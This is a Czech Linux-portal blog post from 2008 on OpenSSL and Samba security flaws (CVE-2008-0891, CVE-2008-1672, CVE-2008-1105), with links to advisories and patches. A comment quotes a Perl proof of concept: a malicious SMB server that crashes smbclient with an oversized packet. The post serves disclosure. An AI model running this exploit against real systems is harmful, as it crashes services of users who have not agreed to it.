abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
Přihlášení | Registrace
×
napište » Zprávičky
inzerujte » Pracovní nabídky
    Ze státního systému unikly osobní údaje zaměstnanců firem
    včera 11:22 | Bezpečnostní upozornění

    Úřad pro ochranu osobních údajů řeší desítky stížností na jednotné měsíční hlášení zaměstnavatele, které stát spustil počátkem dubna. Systém, jenž má firmám odlehčit od desítek formulářů, nejenže výrazně zatížil jejich účetní oddělení, ale docházelo v něm i k únikům osobních dat zaměstnanců k firmám, kde nepracovali. Podle ministerstva práce a sociálních věcí stála za problémem technická chyba. „Incident se týkal několika stovek

    … více »
    Ladislav Hagara | Komentářů: 3
    Angular 22.0.0
    včera 10:46 | Nová verze

    Byla vydána (𝕏, Bluesky) nová verze 22.0.0 open source webového aplikačního frameworku Angular (Wikipedie). Přehled novinek v příspěvku na blogu.

    Ladislav Hagara | Komentářů: 0
    Vim Classic 8.3
    včera 04:33 | Nová verze

    Vim Classic byl vydán ve verzi 8.3. Drew DeVault oznámil tento fork editoru Vim (verze 8.2.0148, tj. těsně před zavedením Vim9 skriptování) v březnu letošního roku. Důvodem forku bylo, že vývojáři editorů Vim a Neovim začali při vývoji využívat LLM.

    Ladislav Hagara | Komentářů: 5
    DevConf.CZ 2026 / Program a registrace
    včera 03:44 | Komunita

    Open source konference DevConf.CZ 2026 proběhne 18. a 19. června v Brně na FIT VUT. Publikován byl program a spuštěna byla registrace.

    Ladislav Hagara | Komentářů: 0
    Velký jazykový model Mellum2
    3.6. 19:44 | Nová verze

    Společnost JetBrains uvolnila verzi 2 svého open-source velkého jazykového modelu (LLM) pro vývojáře Mellum.

    Ladislav Hagara | Komentářů: 0
    Microsoft Build 2026
    3.6. 14:44 | IT novinky

    Probíhá konference Microsoft Build 2026. Microsoft představuje své novinky: kvantový čip Majorana 2, Surface Laptop Ultra a Surface RTX Spark Dev Box s NVIDIA RTX Spark, Intelligent Terminal, Coreutils for Windows (fork Rust Coreutils), AI modely MAI, AI agenta Scout, platformu pro agent-first zařízení Project Solara, …

    Ladislav Hagara | Komentářů: 0
    Google Chrome 149
    3.6. 12:44 | Nová verze

    Google Chrome 149 byl prohlášen za stabilní. Nejnovější stabilní verze 149.0.7827.53 přináší řadu novinek. Podrobný přehled v poznámkách k vydání. Vylepšeny byly také nástroje pro vývojáře.

    Ladislav Hagara | Komentářů: 0
    Pluto.jl 1.0
    3.6. 10:55 | Nová verze

    Pluto.jl, reaktivní notebook pro programovací jazyk Julia, dospěl do verze 1.0.

    Ladislav Hagara | Komentářů: 4
    Snap! 12.0.0
    2.6. 13:44 | Nová verze

    Byla vydána nová verze 12.0.0 vizuálního programovacího jazyka Snap! (Wikipedie) inspirovaného jazykem Scratch (Wikipedie). Přehled novinek na GitHubu.

    Ladislav Hagara | Komentářů: 0
    Hra Gravity Circuit na Steamu zdarma
    2.6. 11:44 | IT novinky

    Počítačovou hru Gravity Circuit (ProtonDB) lze do 14. června do 19:00 získat na Steamu zdarma. Napořád.

    Ladislav Hagara | Komentářů: 0
    Centrum | Napsat | Starší
    navrhněte » Anketa
    Které desktopové prostředí na Linuxu používáte?
     (12%)
     (8%)
     (2%)
     (15%)
     (31%)
     (4%)
     (6%)
     (3%)
     (15%)
     (26%)
    Celkem 1818 hlasů
     Komentářů: 30, poslední 3.4. 20:20
    Rozcestník
    AbcLinuxu
    HDmag.cz
    Ladislav Hagara - Ride the Raven
    Ride the Raven to gaze the sorcery world, where you can summon, cast and dispel spells and scribe grimoires in your codex.
    Aktuální zápisy
    ?Přístup k archivovaným zápisům za jednotlivé měsíce. Archív


    ?Seznam mých oblíbených stránek, které pravidelně navštěvuji. Oblíbené stránky
    ?Poslední screenshot mého desktopu. Současný desktop
    Vivaldi 6.6 a vynucený tmavý styl AbcLinuxu
    ?Přístup na osobní hlavní stranu a na hlavní stranu všech blogů. Navigace
    Nej blogů na AbcLinuxu
    Nejčtenější za poslední měsíc Nejkomentovanější za poslední měsíc
    AbcLinuxu:/ Blogy / Ride the Raven / GNU/Linux / OpenSSL a Samba / bezpečnostní problémy
    Štítky: aktualizace, bug, C, programování, Samba, server

    OpenSSL a Samba / bezpečnostní problémy

    28.5.2008 18:35 | Přečteno: 3074× | GNU/Linux | poslední úprava: 29.5.2008 17:57


    Dnes byly zveřejněny bezpečnostní problémy v OpenSSL SecurityFocus bid 29405 a Sambě SecurityFocus bid 29404. Nová verze OpenSSL 0.9.8h opravuje dva bezpečnostní problémy. Jde o CVE-2008-0891 a CVE-2008-1672. Pokud byla knihovna OpenSSL přeložena s rozšířením "TLS server name" (implicitně vypnuto), může útočník na dálku shodit serverovou službu využívající této knihovny. Druhý problém může být pro změnu zneužít obráceně. Klientská aplikace může být shozena (crash) zákeřným serverem při navazování šifrované komunikace.

    Ukázky shození openssl jak klienta (openssl s_client ...), tak i serveru (openssl s_server ...), například na CERT-FI.

    Samba dnes také nebyla ušetřena. V oznámení na stránce Secunia.com se píše o přetečení (Buffer Overflow) ve funkci receive_smb_raw() v souboru lib/util_sock.c. Problém byl vývojářům Samby oznámen 15. května a dnes 28. května byl oficiálně zveřejněn. Jedná se o bezpečnostní problém CVE-2008-1105.

    V případě, že lze klientskou část obelstít a přinutit ji k navázání spojení se zákeřným serverem, například pouhým kliknutím na odkaz "smb://" nebo zasláním speciálně upraveného datového bloku nmbd serveru, lze ji také (i když zatím pouze teoreticky) přinutit spustit libovolný kód.

    Poněvadž serverová část, speciálně proces smbd, může být současně klientem, týká se tento bezpečnostní problém také Samba serveru.

    V linuxových distribucích se postupně objevují bezpečnostní aktualizace.
    Například RedHat Bug 446724 a bezpečnostní oznámení RHSA-2008-0288 a RHSA-2008-0290.

    K dispozici je už také nová verze Samby 3.0.30.

           

    Hodnocení: 100 %

            špatnédobré        

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    Komentáře

    Nástroje: Začni sledovat (0) ?Zašle upozornění na váš email při vložení nového komentáře. , Tisk

    Vložit další komentář

    2.6.2008 12:46 Ladislav Hagara | skóre: 107 | blog: Ride the Raven
    Rozbalit Rozbalit vše Re: OpenSSL a Samba / bezpečnostní problémy
    Bugtraq ID 29404 (SAMBA) zmiňuje následující POC (Proof Of Concept).
    #!/usr/bin/perl
# 06/01/2008 - k`sOSe
#
# ~ # smbclient //localhost/w00t
# *** glibc detected *** smbclient: free(): invalid next size (fast): 0x0823c2d8 ***
#

use warnings;
use strict;
use IO::Socket;


my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '445', Listen => 1, Reuse => 1) || die($!);

while(my $csock = $sock->accept())
{
	print $csock	"\x00" .
			"\x01\xff\xff" .
			"\x41" x 131071;
			
}
    Píšeme jinde
    ISSN 1214-1267   www.czech-server.cz
    Redakce | Inzerce | Podmínky použití | Osobní údaje
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.